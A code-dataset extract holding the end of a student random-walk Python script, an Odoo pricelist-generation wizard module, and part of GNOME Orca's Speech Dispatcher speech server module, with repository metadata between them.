elif 0.25<=probability<0.5:
direction= "north"
elif 0.5<= probability<0.75:
direction= "south"
else:
direction = "east"
return direction
def get_direction_displacement():
displacements = {
'west': (-1, 0),
'east': (1, 0),
'north': (0, 1),
'south': (0, -1)
}
displacement = displacements.get(get_random_direction())
return displacement
def take_walk(steps):
current_location = [0, 0]
for step_index in range(steps):
direction = get_random_direction()
displacement = get_direction_displacement()
# extract the numerical values from the tuple
delta_x = displacement[0]
delta_y = displacement[1]
current_location[0] += delta_x
current_location[1] += delta_y
return current_location
# UPDATE current_location HERE
# consult example in 'Storing and Updating State' for method to update
# current_location
def take_all_walks(steps, runs):
endpoints = []
for run_index in range(runs):
end_location = take_walk(steps)
endpoints.append(end_location)
return endpoints
return end_location
print (endpoints)
print (end_location)
def average_final_distance(endpoints):
total_distance = 0
for coords in endpoints:
dx = coords[0]
dy = coords[1]
#use the Pythagorean theorem to get distance like last session
distance = math.sqrt(dx**2 + dy**2)
total_distance += distance
return total_distance / len(endpoints)
if __name__ == "__main__":
steps = 10
if len(sys.argv) > 1:
steps = int(sys.argv[1])
runs = 1
if len(sys.argv) > 2:
runs = int(sys.argv[2])
end_locations = take_all_walks(steps, runs)
current_location = take_walk(steps)
#if len(sys.argv) > 1:
#steps = int(sys.argv[1])
print("Done with walk, printing end location: ")
#print(current_location)
print (end_locations)
average_displacement = average_final_distance(end_locations)
print(average_displacement)
|
mit
| -265,223,460,572,834,500
| 26.855422
| 78
| 0.609429
| false
| 3.664025
| false
| false
| false
|
Micronaet/micronaet-migration
|
report_product_pricelist/wizard/create_pricelist.py
|
1
|
18271
|
# -*- coding: utf-8 -*-
###############################################################################
#
# ODOO (ex OpenERP)
# Open Source Management Solution
# Copyright (C) 2001-2015 Micronaet S.r.l. (<http://www.micronaet.it>)
# Developer: Nicola Riolini @thebrush (<https://it.linkedin.com/in/thebrush>)
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
import os
import sys
import logging
import openerp
import openerp.netsvc as netsvc
import openerp.addons.decimal_precision as dp
from openerp.osv import fields, osv, expression, orm
from datetime import datetime, timedelta
from dateutil.relativedelta import relativedelta
from openerp import SUPERUSER_ID, api
from openerp import tools
from openerp.tools.translate import _
from openerp.tools.float_utils import float_round as round
from openerp.tools import (DEFAULT_SERVER_DATE_FORMAT,
DEFAULT_SERVER_DATETIME_FORMAT,
DATETIME_FORMATS_MAP,
float_compare)
_logger = logging.getLogger(__name__)
class MicronaetInvoiceLine(orm.Model):
''' Invoice line
'''
_name = 'micronaet.invoice.line'
_description = 'Invoice line'
_order = 'date'
_columns = {
'name': fields.char('Invoice number', size=10, required=True),
'partner': fields.char('Invoice number', size=9),
'price': fields.char('Invoice number', size=15),
'quantity': fields.char('Invoice number', size=10),
'product': fields.char('Invoice number', size=10),
'date': fields.char('Invoice number', size=10),
}
# Product pricelist from model to generated:
class product_pricelist_generator(orm.TransientModel):
""" Product pricelist generator
Copy an inactive pricelist creating a new pricelist with all product
and calculate the price with actual pricelist rules
"""
_name = "product.pricelist.generator"
_description = "Product pricelist generator"
_columns = {
'pricelist_org_id': fields.many2one(
'product.pricelist', 'Original pricelist', required=True,
help="Choose original pricelist used to calculate new complete "
"pricelist/version"),
'new': fields.boolean('New',
help="Generate a new pricelist with this name"),
'new_name': fields.char('New version name', size=64),
'pricelist_des_id': fields.many2one(
'product.pricelist', 'Destination pricelist',
help="If no new pricelist, use this pricelist to upgrade fields"),
}
_defaults = {
'new': lambda *x: True,
}
def do_create_update(self, cr, uid, ids, context=None):
""" Create or update pricelist
@param cr: the current row, from the database cursor,
@param uid: the current user’s ID for security checks,
@param ids: List of ids
@return: Dictionary {}
"""
if context is None:
context={}
wiz_browse = self.browse(cr, uid, ids[0], context=context)
pricelist_ref_id = wiz_browse.pricelist_org_id.id
if wiz_browse.new: # per ora facciamo questo
if not wiz_browse.new_name: # TODO and duplicated!
# TODO comunicate error!
return {'type': 'ir.actions.act_window_close'}
# Create new pricelist and pricelist version
pricelist_id = self.pool.get('product.pricelist').create(cr, uid, {
'name': wiz_browse.new_name,
'type': 'sale',
'tipology': 'historical',
})
if pricelist_id:
version_id = self.pool.get('product.pricelist.version').create(
cr, uid, {
'name': "Versione: " + wiz_browse.new_name + \
" definitiva",
#'date_end': False,
#'date_start': False,
#'company_id': False,
#'active': True,
'pricelist_id': pricelist_id,
})
else:
pass
else:
# Get pricelist and pricelist version
pricelist_id = 0
version_id = 0
# creati o trovati i listino/versione e deve esistere l'origine
if pricelist_id and version_id and wiz_browse.pricelist_org_id:
product_ids = self.pool.get('product.product').search(
cr, uid, [('mexal_id', 'ilike', 'C')], context=context)
# TODO write right filter
for product in self.pool.get('product.product').read(
cr, uid, product_ids, ['id', 'name', 'code']):
if product['code'][0:1].upper() == "C":
price_calc = self.pool.get('product.pricelist').price_get(
cr, uid, [pricelist_ref_id], product['id'], 1.0, False, {
'uom': False,
'date': False,
})[pricelist_ref_id]
self.pool.get('product.pricelist.item').create(
cr, uid, {
'price_round': 0.00001,
'price_discount': 0.0, #0.052600000000000001,
#'base_pricelist_id': False,
'sequence': 200,
'price_max_margin': 0.0,
#'company_id': False,
#'product_tmpl_id': False,
'product_id': product['id'],
'base': 1,
#[3, 'Rif. anno 2011'],
'price_version_id': version_id,
'min_quantity': 1,
# TODO Calcolare in funzione del listino
'price_surcharge': price_calc,
#'price_min_margin': 0.0,
#'categ_id': False,
'name': "[%s] %s"%(product['code'], product['name']),
})
else:
pass # TODO comunicate error!
return {'type': 'ir.actions.act_window_close'}
# Product pricelist for customer:
class product_pricelist_customer(orm.TransientModel):
""" Product pricelist generator for customers
"""
_name = "product.pricelist.customer"
_description = "Product pricelist customer"
_columns = {
'partner_id': fields.many2one('res.partner', 'Partner', required=True,
help="Choose partner to create custom pricelist or "
"add quotations"),
'comment': fields.char('Comment', size=64,
help="Need to be created or updated"),
'product_id': fields.many2one('product.product', 'Product',
required=True),
'pricelist_id': fields.many2one(
'product.pricelist', 'Current pricelist', required=True,
help="Choose original pricelist used to calculate new complete "
"pricelist/version"),
'pricelist_model_history_id': fields.many2one(
'product.pricelist', 'Listino di riferimento',
help="Listino di riferimento applicato nel caso mancassero degli "
"articoli nel listino di base (usato per avere un raffronto "
"nel caso esistessero particolarità"),
'pricelist_model_id': fields.many2one(
'product.pricelist', 'Listino di paragone',
help="Listino di paragone per avere un raffronto con il prezzo "
"attuale del prodotto"),
'price': fields.float('Price listino cliente', digits=(16, 5)),
'price_model_history': fields.float(
'Prezzo list di rif.', digits=(16, 5)),
'price_model': fields.float('Prezzo di paragone', digits=(16, 5)),
'price_history': fields.text('Prezzo storico'),
'price_invoice_history': fields.text('Prezzo storico fatturato'),
}
# on change function
def onchange_pricelist(self, cr, uid, ids, pricelist_id, product_id,
context=None):
''' Read price from pricelist for product
'''
if context is None:
context={}
res = {'value': {}}
if pricelist_id: # cerco il listino
res['value']['price']=self.pool.get('product.pricelist').price_get(
cr, uid, [pricelist_id], product_id , 1.0, False, {
'uom': False, 'date': False})[pricelist_id]
return res # fino a qui per ora
#Azzero il prezzo
return {'value': {'price': False}}
def onchange_partner_pricelist(self, cr, uid, ids, partner_id,
pricelist_id, product_id, context = None):
'''Create a new pricelist if not custom
add custom price
add old version as reference
'''
if context is None:
context = {}
res={'value': {}}
if partner_id: # cerco il listino
partner = self.pool.get("res.partner").browse(cr, uid, partner_id)
partner_pricelist_id = partner.property_product_pricelist.id or 0
# pricelist_id only if not passed (to keep the change)
if not pricelist_id:
pricelist_id=partner_pricelist_id
res['value']['pricelist_id']=pricelist_id
res['value'][
'pricelist_model_history_id'] = \
partner.pricelist_model_history_id.id or 0
res['value']['pricelist_model_id'] = \
partner.pricelist_model_id.id or 0
return res # fino a qui per ora
return {'value': {}}
def onchange_partner_pricelist_product(self, cr, uid, ids, partner_id,
pricelist_id, product_id, pricelist_model_history_id,
pricelist_model_id, context = None):
'''Create a new pricelist if not custom
add custom price
add old version as reference
'''
if context is None:
context = {}
res = {'value': {}}
if product_id and pricelist_id: # cerco il listino
res['value']['price'] = self.pool.get(
'product.pricelist').price_get(
cr, uid, [pricelist_id], product_id , 1.0, False, {
'uom': False,
'date': False,
})[pricelist_id] if pricelist_id else ""
res['value']['price_model_history'] = self.pool.get(
'product.pricelist').price_get(
cr, uid, [pricelist_model_history_id], product_id , 1.0,
False, {
'uom': False,
'date': False,
})[pricelist_model_history_id] if \
pricelist_model_history_id else ""
res['value']['price_model'] = self.pool.get(
'product.pricelist').price_get(
cr, uid, [pricelist_model_id], product_id , 1.0, False, {
'uom': False,
'date': False,
})[pricelist_model_id] if pricelist_model_id else ""
# Order history:
order_line_ids = self.pool.get('sale.order.line').search(
cr, uid, [
('product_id','=',product_id),
('order_partner_id','=',partner_id),
])
if order_line_ids:
list_quotation = "%20s%20s%20s%40s\n" % (
"Data", "Ordine", "Prezzo", "Commento")
for line in self.pool.get('sale.order.line').browse(
cr, uid, order_line_ids):
list_quotation += "%20s%20s%20s%40s\n" % (
datetime.strptime(
line.order_id.date_order, '%Y-%m-%d').strftime(
'%d/%m/%Y'),
line.order_id.name,
line.price_unit,
line.price_comment or "")
res['value']['price_history'] = list_quotation
else:
res['value']['price_history'] = ""
# Invoice history:
product_proxy = self.pool.get('product.product').browse(
cr, uid, product_id)
product_code = product_proxy.code #"C3114409"
partner_proxy = self.pool.get('res.partner').browse(
cr, uid, partner_id)
partner_code = partner_proxy.mexal_c #"230.00179" # TODO parametrize
invoice_line_ids = self.pool.get('micronaet.invoice.line').search(
cr, uid, [
('product','=',product_code),
('partner','=',partner_code),
])
if invoice_line_ids:
list_quotation = "%20s%20s%20s%20s\n" % (
"Data","Fattura","Prezzo", "Q.")
for line in self.pool.get('micronaet.invoice.line').browse(
cr, uid, invoice_line_ids):
list_quotation += "%20s%20s%20s%20s\n" % (
datetime.strptime(line.date, '%Y%m%d').strftime(
'%d/%m/%Y'), line.name, line.price, line.quantity)
res['value']['price_invoice_history'] = list_quotation
else:
res['value']['price_invoice_history'] = ""
return res
# Azzero tutto:
return {'value': {
'price': False,
'price_model_history': False,
'price_model': False,
'price_history': False,
'price_invoice_history': False,
}}
# event function
def do_insert_quotation(self, cr, uid, ids, context=None):
""" Create or update pricelist if non custom and add personalization
@param cr: the current row, from the database cursor,
@param uid: the current user’s ID for security checks,
@param ids: List of ids
@return: Dictionary {}
"""
if context is None:
context={}
wiz_browse = self.browse(cr, uid, ids[0], context=context)
customer_proxy = self.pool.get('res.partner').browse(
cr, uid, wiz_browse.partner_id.id)
pricelist_org_id = wiz_browse.pricelist_id.id # old pricelist set up
pricelist_proxy = self.pool.get('product.pricelist').browse(
cr, uid, pricelist_org_id)
if not pricelist_proxy.customized: # Create customized and first rule
update = False
pricelist_ref_id = self.pool.get('product.pricelist').create(
cr, uid, {
'name': "Personal: " + customer_proxy.name,
'type': 'sale',
'customized': True,
})
if pricelist_ref_id:
version_ref_id = self.pool.get(
'product.pricelist.version').create(
cr, uid, {
'name': "From " + \
customer_proxy.property_product_pricelist.name,
#'date_end': False,
#'date_start': False,
#'company_id': False,
#'active': True,
'pricelist_id': pricelist_ref_id, #appena creato
})
else:
pass # TODO comunicate error
else: # yet custom pricelist
update = True
pricelist_ref_id = customer_proxy.property_product_pricelist.id
# TODO take the first for now!
version_ref_id = \
customer_proxy.property_product_pricelist.version_id[0].id
if not (pricelist_ref_id and version_ref_id):
# TODO comunicate error!
return {'type': 'ir.actions.act_window_close'}
pricelist_item_pool = self.pool.get('product.pricelist.item')
# ultima regola per prendere come riferimento il listino precedente
if not update: # Create ref. pricelist only for first new!
rule_id = pricelist_item_pool.create(cr, uid, {
'price_round': 0.00001,
'price_discount': 0.0, #0.052600000000000001,
'sequence': 500, # ultima
'price_max_margin': 0.0,
'base': 2, # pricelist version
'price_version_id': version_ref_id, #owner version
'min_quantity': 1,
'price_surcharge': 0.0,
'base_pricelist_id': pricelist_ref_id,
'name': "Listino rif: " + \
customer_proxy.property_product_pricelist.name,
})
# Creo la regola in base a prezzo e prodotto attuale
# TODO cercare se esiste già!!!!!
rule_id = pricelist_item_pool.create(cr, uid, {
'price_round': 0.00001,
'price_discount': 0.0, #0.052600000000000001,
'sequence': 10, # tra le prime
'price_max_margin': 0.0,
'product_id': wiz_browse.product_id.id,
'base': 1,
'price_version_id': version_ref_id,
'min_quantity': 1,
'price_surcharge': wiz_browse.price,
'name': "[%s] %s" % (
wiz_browse.product_id.code,
wiz_browse.product_id.name),
})
# Set up partner with new pricelist
self.pool.get('res.partner').write(cr, uid, [wiz_browse.partner_id.id],
{'property_product_pricelist': pricelist_ref_id})
return {'type': 'ir.actions.act_window_close'}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
| -7,251,331,763,021,639,000
| 40.988506
| 79
| 0.528552
| false
| 4.181548
| false
| false
| false
|
GNOME/orca
|
src/orca/speechdispatcherfactory.py
|
1
|
27427
|
# Copyright 2006, 2007, 2008, 2009 Brailcom, o.p.s.
#
# Author: Tomas Cerha <cerha@brailcom.org>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., Franklin Street, Fifth Floor,
# Boston MA 02110-1301 USA.
# # [[[TODO: richb - Pylint is giving us a bunch of warnings along these
# lines throughout this file:
#
# W0142:202:SpeechServer._send_command: Used * or ** magic
#
# So for now, we just disable these warnings in this module.]]]
#
# pylint: disable-msg=W0142
"""Provides an Orca speech server for Speech Dispatcher backend."""
__id__ = "$Id$"
__version__ = "$Revision$"
__date__ = "$Date$"
__author__ = "Tomas Cerha <cerha@brailcom.org>"
__copyright__ = "Copyright (c) 2006-2008 Brailcom, o.p.s."
__license__ = "LGPL"
from gi.repository import GLib
import re
import time
from . import chnames
from . import debug
from . import guilabels
from . import messages
from . import speechserver
from . import settings
from . import orca_state
from . import punctuation_settings
from . import settings_manager
from .acss import ACSS
_settingsManager = settings_manager.getManager()
try:
import speechd
except:
_speechd_available = False
else:
_speechd_available = True
try:
getattr(speechd, "CallbackType")
except AttributeError:
_speechd_version_ok = False
else:
_speechd_version_ok = True
PUNCTUATION = re.compile(r'[^\w\s]', re.UNICODE)
ELLIPSIS = re.compile('(\342\200\246|(?<!\\.)\\.{3,4}(?=(\\s|\\Z)))')
class SpeechServer(speechserver.SpeechServer):
# See the parent class for documentation.
_active_servers = {}
DEFAULT_SERVER_ID = 'default'
_SERVER_NAMES = {DEFAULT_SERVER_ID: guilabels.DEFAULT_SYNTHESIZER}
@staticmethod
def getFactoryName():
return guilabels.SPEECH_DISPATCHER
@staticmethod
def getSpeechServers():
servers = []
default = SpeechServer._getSpeechServer(SpeechServer.DEFAULT_SERVER_ID)
if default is not None:
servers.append(default)
for module in default.list_output_modules():
servers.append(SpeechServer._getSpeechServer(module))
return servers
@classmethod
def _getSpeechServer(cls, serverId):
"""Return an active server for given id.
Attempt to create the server if it doesn't exist yet. Returns None
when it is not possible to create the server.
"""
if serverId not in cls._active_servers:
cls(serverId)
# Don't return the instance, unless it is successfully added
# to `_active_Servers'.
return cls._active_servers.get(serverId)
@staticmethod
def getSpeechServer(info=None):
thisId = info[1] if info is not None else SpeechServer.DEFAULT_SERVER_ID
return SpeechServer._getSpeechServer(thisId)
@staticmethod
def shutdownActiveServers():
servers = [s for s in SpeechServer._active_servers.values()]
for server in servers:
server.shutdown()
# *** Instance methods ***
def __init__(self, serverId):
super(SpeechServer, self).__init__()
self._id = serverId
self._client = None
self._current_voice_properties = {}
self._acss_manipulators = (
(ACSS.RATE, self._set_rate),
(ACSS.AVERAGE_PITCH, self._set_pitch),
(ACSS.GAIN, self._set_volume),
(ACSS.FAMILY, self._set_family),
)
if not _speechd_available:
msg = 'ERROR: Speech Dispatcher is not available'
debug.println(debug.LEVEL_WARNING, msg, True)
return
if not _speechd_version_ok:
msg = 'ERROR: Speech Dispatcher version 0.6.2 or later is required.'
debug.println(debug.LEVEL_WARNING, msg, True)
return
# The following constants must be initialized in runtime since they
# depend on the speechd module being available.
try:
most = speechd.PunctuationMode.MOST
except:
most = speechd.PunctuationMode.SOME
self._PUNCTUATION_MODE_MAP = {
settings.PUNCTUATION_STYLE_ALL: speechd.PunctuationMode.ALL,
settings.PUNCTUATION_STYLE_MOST: most,
settings.PUNCTUATION_STYLE_SOME: speechd.PunctuationMode.SOME,
settings.PUNCTUATION_STYLE_NONE: speechd.PunctuationMode.NONE,
}
self._CALLBACK_TYPE_MAP = {
speechd.CallbackType.BEGIN: speechserver.SayAllContext.PROGRESS,
speechd.CallbackType.CANCEL: speechserver.SayAllContext.INTERRUPTED,
speechd.CallbackType.END: speechserver.SayAllContext.COMPLETED,
speechd.CallbackType.INDEX_MARK:speechserver.SayAllContext.PROGRESS,
}
self._default_voice_name = guilabels.SPEECH_DEFAULT_VOICE % serverId
try:
self._init()
except:
debug.printException(debug.LEVEL_WARNING)
msg = 'ERROR: Speech Dispatcher service failed to connect'
debug.println(debug.LEVEL_WARNING, msg, True)
else:
SpeechServer._active_servers[serverId] = self
self._lastKeyEchoTime = None
def _init(self):
self._client = client = speechd.SSIPClient('Orca', component=self._id)
client.set_priority(speechd.Priority.MESSAGE)
if self._id != self.DEFAULT_SERVER_ID:
client.set_output_module(self._id)
self._current_voice_properties = {}
mode = self._PUNCTUATION_MODE_MAP[settings.verbalizePunctuationStyle]
client.set_punctuation(mode)
client.set_data_mode(speechd.DataMode.SSML)
def updateCapitalizationStyle(self):
"""Updates the capitalization style used by the speech server."""
if settings.capitalizationStyle == settings.CAPITALIZATION_STYLE_ICON:
style = 'icon'
elif settings.capitalizationStyle == settings.CAPITALIZATION_STYLE_SPELL:
style = 'spell'
else:
style = 'none'
try:
self._client.set_cap_let_recogn(style)
except speechd.SSIPCommunicationError:
msg = "SPEECH DISPATCHER: Connection lost. Trying to reconnect."
debug.println(debug.LEVEL_INFO, msg, True)
self.reset()
self._client.set_cap_let_recogn(style)
except:
pass
def updatePunctuationLevel(self):
""" Punctuation level changed, inform this speechServer. """
mode = self._PUNCTUATION_MODE_MAP[settings.verbalizePunctuationStyle]
self._client.set_punctuation(mode)
def _send_command(self, command, *args, **kwargs):
try:
return command(*args, **kwargs)
except speechd.SSIPCommunicationError:
msg = "SPEECH DISPATCHER: Connection lost. Trying to reconnect."
debug.println(debug.LEVEL_INFO, msg, True)
self.reset()
return command(*args, **kwargs)
except:
pass
def _set_rate(self, acss_rate):
rate = int(2 * max(0, min(99, acss_rate)) - 98)
self._send_command(self._client.set_rate, rate)
def _set_pitch(self, acss_pitch):
pitch = int(20 * max(0, min(9, acss_pitch)) - 90)
self._send_command(self._client.set_pitch, pitch)
def _set_volume(self, acss_volume):
volume = int(15 * max(0, min(9, acss_volume)) - 35)
self._send_command(self._client.set_volume, volume)
def _get_language_and_dialect(self, acss_family):
if acss_family is None:
acss_family = {}
language = acss_family.get(speechserver.VoiceFamily.LANG)
dialect = acss_family.get(speechserver.VoiceFamily.DIALECT)
if not language:
import locale
familyLocale, encoding = locale.getdefaultlocale()
language, dialect = '', ''
if familyLocale:
localeValues = familyLocale.split('_')
language = localeValues[0]
if len(localeValues) == 2:
dialect = localeValues[1]
return language, dialect
def _set_family(self, acss_family):
lang, dialect = self._get_language_and_dialect(acss_family)
if lang:
self._send_command(self._client.set_language, lang)
if dialect:
# Try to set precise dialect
self._send_command(self._client.set_language, lang + '-' + dialect)
try:
# This command is not available with older SD versions.
set_synthesis_voice = self._client.set_synthesis_voice
except AttributeError:
pass
else:
name = acss_family.get(speechserver.VoiceFamily.NAME)
self._send_command(set_synthesis_voice, name)
def _debug_sd_values(self, prefix=""):
if debug.debugLevel > debug.LEVEL_INFO:
return
try:
sd_rate = self._send_command(self._client.get_rate)
sd_pitch = self._send_command(self._client.get_pitch)
sd_volume = self._send_command(self._client.get_volume)
sd_language = self._send_command(self._client.get_language)
except:
sd_rate = sd_pitch = sd_volume = sd_language = "(exception occurred)"
family = self._current_voice_properties.get(ACSS.FAMILY)
styles = {settings.PUNCTUATION_STYLE_NONE: "NONE",
settings.PUNCTUATION_STYLE_SOME: "SOME",
settings.PUNCTUATION_STYLE_MOST: "MOST",
settings.PUNCTUATION_STYLE_ALL: "ALL"}
current = self._current_voice_properties
msg = "SPEECH DISPATCHER: %s\n" \
"ORCA rate %s, pitch %s, volume %s, language %s, punctuation: %s \n" \
"SD rate %s, pitch %s, volume %s, language %s" % \
(prefix,
self._current_voice_properties.get(ACSS.RATE),
self._current_voice_properties.get(ACSS.AVERAGE_PITCH),
self._current_voice_properties.get(ACSS.GAIN),
self._get_language_and_dialect(family)[0],
styles.get(_settingsManager.getSetting("verbalizePunctuationStyle")),
sd_rate,
sd_pitch,
sd_volume,
sd_language)
debug.println(debug.LEVEL_INFO, msg, True)
def _apply_acss(self, acss):
if acss is None:
acss = settings.voices[settings.DEFAULT_VOICE]
current = self._current_voice_properties
for acss_property, method in self._acss_manipulators:
value = acss.get(acss_property)
if value is not None:
if current.get(acss_property) != value:
method(value)
current[acss_property] = value
elif acss_property == ACSS.AVERAGE_PITCH:
method(5.0)
current[acss_property] = 5.0
elif acss_property == ACSS.GAIN:
method(10)
current[acss_property] = 5.0
elif acss_property == ACSS.RATE:
method(50)
current[acss_property] = 5.0
elif acss_property == ACSS.FAMILY:
method({})
current[acss_property] = {}
def __addVerbalizedPunctuation(self, oldText):
"""Depending upon the users verbalized punctuation setting,
adjust punctuation symbols in the given text to their pronounced
equivalents. The pronounced text will either replace the
punctuation symbol or be inserted before it. In the latter case,
this is to retain spoken prosity.
Arguments:
- oldText: text to be parsed for punctuation.
Returns a text string with the punctuation symbols adjusted accordingly.
"""
style = _settingsManager.getSetting("verbalizePunctuationStyle")
if style == settings.PUNCTUATION_STYLE_NONE:
return oldText
spokenEllipsis = messages.SPOKEN_ELLIPSIS + " "
newText = re.sub(ELLIPSIS, spokenEllipsis, oldText)
symbols = set(re.findall(PUNCTUATION, newText))
for symbol in symbols:
try:
level, action = punctuation_settings.getPunctuationInfo(symbol)
except:
continue
if level != punctuation_settings.LEVEL_NONE:
# Speech Dispatcher should handle it.
#
continue
charName = " %s " % chnames.getCharacterName(symbol)
if action == punctuation_settings.PUNCTUATION_INSERT:
charName += symbol
newText = re.sub(symbol, charName, newText)
if orca_state.activeScript:
newText = orca_state.activeScript.utilities.adjustForDigits(newText)
return newText
def _speak(self, text, acss, **kwargs):
if isinstance(text, ACSS):
text = ''
# Mark beginning of words with U+E000 (private use) and record the
# string offsets
# Note: we need to do this before disturbing the text offsets
# Note2: we assume that text mangling below leave U+E000 untouched
last_begin = None
last_end = None
is_numeric = None
marks_offsets = []
marks_endoffsets = []
marked_text = ""
for i in range(len(text)):
c = text[i]
if c == '\ue000':
# Original text already contains U+E000. But syntheses will not
# know what to do of it anyway, so discard it
continue
if not c.isspace() and last_begin == None:
# Word begin
marked_text += '\ue000'
last_begin = i
is_numeric = c.isnumeric()
elif c.isspace() and last_begin != None:
# Word end
if is_numeric:
# We had a wholy numeric word, possibly next word is as well.
# Skip to next word
for j in range(i+1, len(text)):
if not text[j].isspace():
break
else:
is_numeric = False
# Check next word
while is_numeric and j < len(text) and not text[j].isspace():
if not text[j].isnumeric():
is_numeric = False
j += 1
if not is_numeric:
# add a mark
marks_offsets.append(last_begin)
marks_endoffsets.append(i)
last_begin = None
is_numeric = None
elif is_numeric and not c.isnumeric():
is_numeric = False
marked_text += c
if last_begin != None:
# Finished with a word
marks_offsets.append(last_begin)
marks_endoffsets.append(i + 1)
text = marked_text
text = self.__addVerbalizedPunctuation(text)
if orca_state.activeScript:
text = orca_state.activeScript.\
utilities.adjustForPronunciation(text)
# Replace no break space characters with plain spaces since some
# synthesizers cannot handle them. See bug #591734.
#
text = text.replace('\u00a0', ' ')
# Replace newline followed by full stop, since
# this seems to crash sd, see bgo#618334.
#
text = text.replace('\n.', '\n')
# Transcribe to SSML, translating U+E000 into marks
# Note: we need to do this after all mangling otherwise the ssml markup
# would get mangled too
ssml = "<speak>"
i = 0
for c in text:
if c == '\ue000':
if i >= len(marks_offsets):
# This is really not supposed to happen
msg = "%uth U+E000 does not have corresponding index" % i
debug.println(debug.LEVEL_WARNING, msg, True)
else:
ssml += '<mark name="%u:%u"/>' % (marks_offsets[i], marks_endoffsets[i])
i += 1
# Disable for now, until speech dispatcher properly parses them (version 0.8.9 or later)
#elif c == '"':
# ssml += '"'
#elif c == "'":
# ssml += '''
elif c == '<':
ssml += '<'
elif c == '>':
ssml += '>'
elif c == '&':
ssml += '&'
else:
ssml += c
ssml += "</speak>"
self._apply_acss(acss)
self._debug_sd_values("Speaking '%s' " % ssml)
self._send_command(self._client.speak, ssml, **kwargs)
def _say_all(self, iterator, orca_callback):
"""Process another sayAll chunk.
Called by the gidle thread.
"""
try:
context, acss = next(iterator)
except StopIteration:
pass
else:
def callback(callbackType, index_mark=None):
# This callback is called in Speech Dispatcher listener thread.
# No subsequent Speech Dispatcher interaction is allowed here,
# so we pass the calls to the gidle thread.
t = self._CALLBACK_TYPE_MAP[callbackType]
if t == speechserver.SayAllContext.PROGRESS:
if index_mark:
index = index_mark.split(':')
if len(index) >= 2:
start, end = index[0:2]
context.currentOffset = context.startOffset + int(start)
context.currentEndOffset = context.startOffset + int(end)
msg = "SPEECH DISPATCHER: Got mark %d:%d / %d-%d" % \
(context.currentOffset, context.currentEndOffset, \
context.startOffset, context.endOffset)
debug.println(debug.LEVEL_INFO, msg, True)
else:
context.currentOffset = context.startOffset
context.currentEndOffset = None
elif t == speechserver.SayAllContext.COMPLETED:
context.currentOffset = context.endOffset
context.currentEndOffset = None
GLib.idle_add(orca_callback, context, t)
if t == speechserver.SayAllContext.COMPLETED:
GLib.idle_add(self._say_all, iterator, orca_callback)
self._speak(context.utterance, acss, callback=callback,
event_types=list(self._CALLBACK_TYPE_MAP.keys()))
return False # to indicate, that we don't want to be called again.
def _cancel(self):
self._send_command(self._client.cancel)
def _change_default_speech_rate(self, step, decrease=False):
acss = settings.voices[settings.DEFAULT_VOICE]
delta = step * (decrease and -1 or +1)
try:
rate = acss[ACSS.RATE]
except KeyError:
rate = 50
acss[ACSS.RATE] = max(0, min(99, rate + delta))
msg = 'SPEECH DISPATCHER: Rate set to %d' % rate
debug.println(debug.LEVEL_INFO, msg, True)
self.speak(decrease and messages.SPEECH_SLOWER \
or messages.SPEECH_FASTER, acss=acss)
def _change_default_speech_pitch(self, step, decrease=False):
acss = settings.voices[settings.DEFAULT_VOICE]
delta = step * (decrease and -1 or +1)
try:
pitch = acss[ACSS.AVERAGE_PITCH]
except KeyError:
pitch = 5
acss[ACSS.AVERAGE_PITCH] = max(0, min(9, pitch + delta))
msg = 'SPEECH DISPATCHER: Pitch set to %d' % pitch
debug.println(debug.LEVEL_INFO, msg, True)
self.speak(decrease and messages.SPEECH_LOWER \
or messages.SPEECH_HIGHER, acss=acss)
def _change_default_speech_volume(self, step, decrease=False):
acss = settings.voices[settings.DEFAULT_VOICE]
delta = step * (decrease and -1 or +1)
try:
volume = acss[ACSS.GAIN]
except KeyError:
volume = 10
acss[ACSS.GAIN] = max(0, min(9, volume + delta))
msg = 'SPEECH DISPATCHER: Volume set to %d' % volume
debug.println(debug.LEVEL_INFO, msg, True)
self.speak(decrease and messages.SPEECH_SOFTER \
or messages.SPEECH_LOUDER, acss=acss)
def getInfo(self):
return [self._SERVER_NAMES.get(self._id, self._id), self._id]
def getVoiceFamilies(self):
# Always offer the configured default voice with a language
# set according to the current locale.
from locale import getlocale, LC_MESSAGES
locale = getlocale(LC_MESSAGES)[0]
if locale is None or locale == 'C':
locale_language = None
else:
locale_lang, locale_dialect = locale.split('_')
locale_language = locale_lang + '-' + locale_dialect
voices = ()
try:
# This command is not available with older SD versions.
list_synthesis_voices = self._client.list_synthesis_voices
except AttributeError:
pass
else:
try:
voices += self._send_command(list_synthesis_voices)
except:
pass
default_lang = ""
if locale_language:
# Check whether how it appears in the server list
for name, lang, variant in voices:
if lang == locale_language:
default_lang = locale_language
break
if not default_lang:
for name, lang, variant in voices:
if lang == locale_lang:
default_lang = locale_lang
if not default_lang:
default_lang = locale_language
voices = ((self._default_voice_name, default_lang, None),) + voices
families = []
for name, lang, variant in voices:
families.append(speechserver.VoiceFamily({ \
speechserver.VoiceFamily.NAME: name,
#speechserver.VoiceFamily.GENDER: speechserver.VoiceFamily.MALE,
speechserver.VoiceFamily.LANG: lang.partition("-")[0],
speechserver.VoiceFamily.DIALECT: lang.partition("-")[2],
speechserver.VoiceFamily.VARIANT: variant}))
return families
def speak(self, text=None, acss=None, interrupt=True):
# In order to re-enable this, a potentially non-trivial amount of work
# will be needed to ensure multiple utterances sent to speech.speak
# do not result in the intial utterances getting cut off before they
# can be heard by the user. Anyone needing to interrupt speech can
# do so via speech.stop -- or better yet, by using the default script
# method's presentationInterrupt.
#if interrupt:
# self._cancel()
# "We will not interrupt a key echo in progress." (Said the comment in
# speech.py where these next two lines used to live. But the code here
